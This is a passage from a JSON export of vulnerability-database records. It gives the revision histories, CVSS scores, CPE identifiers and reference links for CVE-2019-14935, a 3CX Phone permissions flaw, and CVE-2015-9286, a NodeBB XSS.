["https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/"], "reporter": "cve@mitre.org", "title": "CVE-2019-14935", "type": "cve", "viewCount": 61}, "different_elements": ["cpeConfiguration"], "edition": 7, "lastseen": "2021-02-02T07:12:52"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "3cx:3cx", "name": "3cx", "operator": "eq", "version": "15"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:3cx:3cx:15"], "cpe23": ["cpe:2.3:a:3cx:3cx:15:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2019-14935"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-732"], "description": "3CX Phone 15 on Windows has insecure permissions on the \"%PROGRAMDATA%\\3CXPhone for Windows\\PhoneApp\" installation directory, allowing Full Control access for Everyone, and leading to privilege escalation because of a StartUp link.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-09-21T14:54:30", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T14:54:30", "rev": 2, "value": 3.7, "vector": "NONE"}}, "hash": "accfc94015fee892f6d4151c369b779236b69fc552dadeb4e41f9a43481c8bbd", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "5df0cbc8aa96d0c3a2702b7ed41dfb77", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "88039703ac505ae878e5beff9adc7f96", "key": "cpe"}, {"hash": "77a06168ea28e330fa0a440746d3f3b3", "key": "cvss3"}, {"hash": "a242dd034660fbf440f6a442af87b48f", "key": "cvelist"}, {"hash": "dbfa267d59d7141a20d4df760c0086b6", "key": "title"}, {"hash": "a4d2cdd0d6aaf6342ed2f033ba700cdf", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6bd2e583c5269d2b0a8fac4a68b21418", "key": "affectedSoftware"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "7ff3550b63dd1e8accb7b7cfae2aac3c", "key": "references"}, {"hash": "aa21135ab2cca3471ef8a445b18f5523", "key": "description"}, {"hash": "e215275426ed1d0424a91c729740ec75", "key": "cpe23"}, {"hash": "d25ae327664896ff93792d7cd81d7c07", "key": "cwe"}, {"hash": "a2a0222621493f12fcb66b8ac0f2dd01", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14935", "id": "CVE-2019-14935", "lastseen": "2020-09-21T14:54:30", "modified": "2020-08-24T17:37:00", "objectVersion": "1.3", "published": "2019-08-12T00:15:00", "references": ["https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/"], "reporter": "cve@mitre.org", "title": "CVE-2019-14935", "type": "cve", "viewCount": 58}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 5, "lastseen": "2020-09-21T14:54:30"}, {"bulletin": {"affectedSoftware": [{"name": "3cx 3cx", "operator": "eq", "version": "15"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:3cx:3cx:15"], "cpe23": [], "cvelist": ["CVE-2019-14935"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-275"], "description": "3CX Phone 15 on Windows has insecure permissions on the \"%PROGRAMDATA%\\3CXPhone for Windows\\PhoneApp\" installation directory, allowing Full Control access for Everyone, and leading to privilege escalation because of a StartUp link.", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-08-28T11:14:44", "references": [], "rev": 2}, "score": {"modified": "2019-08-28T11:14:44", "rev": 2, "value": 3.7, "vector": "NONE"}}, "hash": "a2679202056b9c11223c7b46b2a9b58f7ac26547112bc94fd96342214373bc0e", "hashmap": [{"hash": "88039703ac505ae878e5beff9adc7f96", "key": "cpe"}, {"hash": "77a06168ea28e330fa0a440746d3f3b3", "key": "cvss3"}, {"hash": "a242dd034660fbf440f6a442af87b48f", "key": "cvelist"}, {"hash": "dbfa267d59d7141a20d4df760c0086b6", "key": "title"}, {"hash": "cb3bffee26571c4b59e476de0c0558f6", "key": "modified"}, {"hash": "a4d2cdd0d6aaf6342ed2f033ba700cdf", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ff5d5bbe3c1fb150e3d86058423a8c6a", "key": "affectedSoftware"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "7ff3550b63dd1e8accb7b7cfae2aac3c", "key": "references"}, {"hash": "aa21135ab2cca3471ef8a445b18f5523", "key": "description"}, {"hash": "a2a0222621493f12fcb66b8ac0f2dd01", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "674581bc3d63992fcfe0179e19145db2", "key": "cwe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14935", "id": "CVE-2019-14935", "lastseen": "2019-08-28T11:14:44", "modified": "2019-08-27T17:49:00", "objectVersion": "1.3", "published": "2019-08-12T00:15:00", "references": ["https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/"], "reporter": "cve@mitre.org", "title": "CVE-2019-14935", "type": "cve", "viewCount": 57}, "differentElements": ["modified", "cwe"], "edition": 3, "lastseen": "2019-08-28T11:14:44"}, {"bulletin": {"affectedSoftware": [{"name": "3cx 3cx", "operator": "eq", "version": "15"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:3cx:3cx:15"], "cpe23": [], "cvelist": ["CVE-2019-14935"], "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-732"], "description": "3CX Phone 15 on Windows has insecure permissions on the \"%PROGRAMDATA%\\3CXPhone for Windows\\PhoneApp\" installation directory, allowing Full Control access for Everyone, and leading to privilege escalation because of a StartUp link.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-08-26T19:42:00", "references": [], "rev": 2}, "score": {"modified": "2020-08-26T19:42:00", "rev": 2, "value": 3.7, "vector": "NONE"}}, "hash": "143e9ec77d33b206deed13fbab89cc9ad8df04fab33538a86b6127ed5f8d1545", "hashmap": [{"hash": "5df0cbc8aa96d0c3a2702b7ed41dfb77", "key": "modified"}, {"hash": "88039703ac505ae878e5beff9adc7f96", "key": "cpe"}, {"hash": "77a06168ea28e330fa0a440746d3f3b3", "key": "cvss3"}, {"hash": "a242dd034660fbf440f6a442af87b48f", "key": "cvelist"}, {"hash": "dbfa267d59d7141a20d4df760c0086b6", "key": "title"}, {"hash": "a4d2cdd0d6aaf6342ed2f033ba700cdf", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "ff5d5bbe3c1fb150e3d86058423a8c6a", "key": "affectedSoftware"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "7ff3550b63dd1e8accb7b7cfae2aac3c", "key": "references"}, {"hash": "aa21135ab2cca3471ef8a445b18f5523", "key": "description"}, {"hash": "d25ae327664896ff93792d7cd81d7c07", "key": "cwe"}, {"hash": "a2a0222621493f12fcb66b8ac0f2dd01", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14935", "id": "CVE-2019-14935", "lastseen": "2020-08-26T19:42:00", "modified": "2020-08-24T17:37:00", "objectVersion": "1.3", "published": "2019-08-12T00:15:00", "references": ["https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/"], "reporter": "cve@mitre.org", "title": "CVE-2019-14935", "type": "cve", "viewCount": 58}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 4, "lastseen": "2020-08-26T19:42:00"}, {"bulletin": {"affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cvelist": ["CVE-2019-14935"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "3CX Phone 15 on Windows has insecure permissions on the \"%PROGRAMDATA%\\3CXPhone for Windows\\PhoneApp\" installation directory, allowing Full Control access for Everyone, and leading to privilege escalation because of a StartUp link.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-08-13T11:02:32", "references": []}, "score": {"modified": "2019-08-13T11:02:32", "value": 3.7, "vector": "NONE"}}, "hash": "c8ff84ff0c49753f0f2d88a463154e386d07fec113bee4603040f407ba216f50", "hashmap": [{"hash": "c5ecd9f4fd451064f3f98c837b7f27bf", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "a242dd034660fbf440f6a442af87b48f", "key": "cvelist"}, {"hash": "dbfa267d59d7141a20d4df760c0086b6", "key": "title"}, {"hash": "a4d2cdd0d6aaf6342ed2f033ba700cdf", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "7ff3550b63dd1e8accb7b7cfae2aac3c", "key": "references"}, {"hash": "aa21135ab2cca3471ef8a445b18f5523", "key": "description"}, {"hash": "a2a0222621493f12fcb66b8ac0f2dd01", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14935", "id": "CVE-2019-14935", "lastseen": "2019-08-13T11:02:32", "modified": "2019-08-12T12:32:00", "objectVersion": "1.3", "published": "2019-08-12T00:15:00", "references": ["https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/"], "reporter": "cve@mitre.org", "title": "CVE-2019-14935", "type": "cve", "viewCount": 56}, "differentElements": ["cvss", "cvss3", "cvss2", "modified", "cpe", "cwe", "affectedSoftware"], "edition": 2, "lastseen": "2019-08-13T11:02:32"}], "edition": 8, "hashmap": [{"key": "affectedConfiguration", "hash": "45e1e5060da05cd667da52bd496de058"}, {"key": "affectedSoftware", "hash": "6bd2e583c5269d2b0a8fac4a68b21418"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "88039703ac505ae878e5beff9adc7f96"}, {"key": "cpe23", "hash": "e215275426ed1d0424a91c729740ec75"}, {"key": "cpeConfiguration", "hash": "c56621732e80e8db2e579f0c31e329cf"}, {"key": "cvelist", "hash": "a242dd034660fbf440f6a442af87b48f"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "77a06168ea28e330fa0a440746d3f3b3"}, {"key": "cwe", "hash": "d25ae327664896ff93792d7cd81d7c07"}, {"key": "description", "hash": "aa21135ab2cca3471ef8a445b18f5523"}, {"key": "extraReferences", "hash": "a220d441920fbb7fc4645a3a7b89614a"}, {"key": "href", "hash": "a2a0222621493f12fcb66b8ac0f2dd01"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "5df0cbc8aa96d0c3a2702b7ed41dfb77"}, {"key": "published", "hash": "a4d2cdd0d6aaf6342ed2f033ba700cdf"}, {"key": "references", "hash": "7ff3550b63dd1e8accb7b7cfae2aac3c"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "dbfa267d59d7141a20d4df760c0086b6"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "beb1549a566835a40acd160258ec011c8f2f345e314d665fabdc2973dc094d17", "viewCount": 64, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-23T00:45:10", "rev": 2}, "score": {"value": 3.7, "vector": "NONE", "modified": "2021-04-23T00:45:10", "rev": 2}}, "objectVersion": "1.5", "cpe": ["cpe:/a:3cx:3cx:15"], "affectedSoftware": [{"cpeName": "3cx:3cx", "name": "3cx", "operator": "eq", "version": "15"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:3cx:3cx:15:*:*:*:*:*:*:*"], "cwe": ["CWE-732"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows", "name": "microsoft windows", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:3cx:3cx:15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/", "refsource": "MISC", "tags": ["Vendor Advisory", "Exploit", "Issue Tracking"], "url": "https://www.3cx.com/community/threads/security-issue-with-3cx-windows-client-install.64432/"}], "immutableFields": []}, {"id": "CVE-2015-9286", "bulletinFamily": "NVD", "title": "CVE-2015-9286", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "published": "2019-04-30T14:29:00", "modified": "2019-05-01T14:22:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "reporter": "cve@mitre.org", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "cvelist": ["CVE-2015-9286"], "type": "cve", "lastseen": "2021-04-22T23:51:50", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:21:32", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2021-02-02T06:21:32", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://github.com/NodeBB/NodeBB/pull/3371", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"], "url": "https://github.com/NodeBB/NodeBB/pull/3371"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"}, {"name": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529"}, {"name": "https://www.vulnerability-lab.com/get_content.php?id=1608", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://www.vulnerability-lab.com/get_content.php?id=1608"}], "hash": "e0413d958386f6534538918bca2249dcc4f383174e07b3bfd828fd87bab2fae7", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "db8254901fea804d4d910fc508c1be32", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "587727297bf29a06aaafbf1f31d41b9a", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "immutableFields": [], "lastseen": "2021-02-02T06:21:32", "modified": "2019-05-01T14:22:00", "objectVersion": "1.5", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 10}, "different_elements": ["cpeConfiguration"], "edition": 6, "lastseen": "2021-02-02T06:21:32"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cwe": ["CWE-79"], "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:09:33", "references": [{"idList": ["SECURITYVULNS:DOC:32625"], "type": "securityvulns"}, {"idList": ["GHSA-72FV-QGJ6-2W2P"], "type": "github"}], "rev": 2}, "score": {"modified": "2020-09-21T14:09:33", "rev": 2, "value": 1.4, "vector": "NONE"}}, "hash": "e856f7b9491cefcc50723678fc0433f12f7c6ae1abe16d206957fd00f74aa6e1", "hashmap": [{"hash": "cabb6b89504f33d4cae5fb66665d6372", "key": "affectedSoftware"}, {"hash": "f9048d548aea2a33f8c8fe44e8c9817c", "key": "cvss3"}, {"hash": "4d53af7f522025f16113d72d1dd86a79", "key": "published"}, {"hash": "0ac6deaa5a07331e3db4762cb458fde6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "7bcda725e0fe4634bd741d18870efc86", "key": "description"}, {"hash": "4419eb17de947d4d6b67ac07ed8d9064", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "8e5a048329755897094215f117301c63", "key": "modified"}, {"hash": "f964d0f7ddcfa3fb2eb8853d2a1e7295", "key": "cvelist"}, {"hash": "dac3bc07a427ceea0c7680630fcafbdf", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "34e69e045b64924bccf865d56b6918a2", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6e87bbaab34c901324df8e163b451120", "key": "title"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "f74a1c24e49a5ecb0eefb5e51d4caa14", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "id": "CVE-2015-9286", "lastseen": "2020-09-21T14:09:33", "modified": "2019-05-01T14:22:00", "objectVersion": "1.3", "published": "2019-04-30T14:29:00", "references": ["https://github.com/NodeBB/NodeBB/pull/3371", "https://github.com/NodeBB/NodeBB/compare/56b79a9...4de7529", "https://www.vulnerability-lab.com/get_content.php?id=1608", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32625"], "reporter": "cve@mitre.org", "title": "CVE-2015-9286", "type": "cve", "viewCount": 4}, "differentElements": ["cpeConfiguration"], "edition": 2, "lastseen": "2020-09-21T14:09:33"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "nodebb:nodebb", "name": "nodebb", "operator": "lt", "version": "0.7.3"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:nodebb:nodebb:0.7.3:*:*:*:*:*:*:*", "versionEndExcluding": "0.7.3", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2015-9286"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": 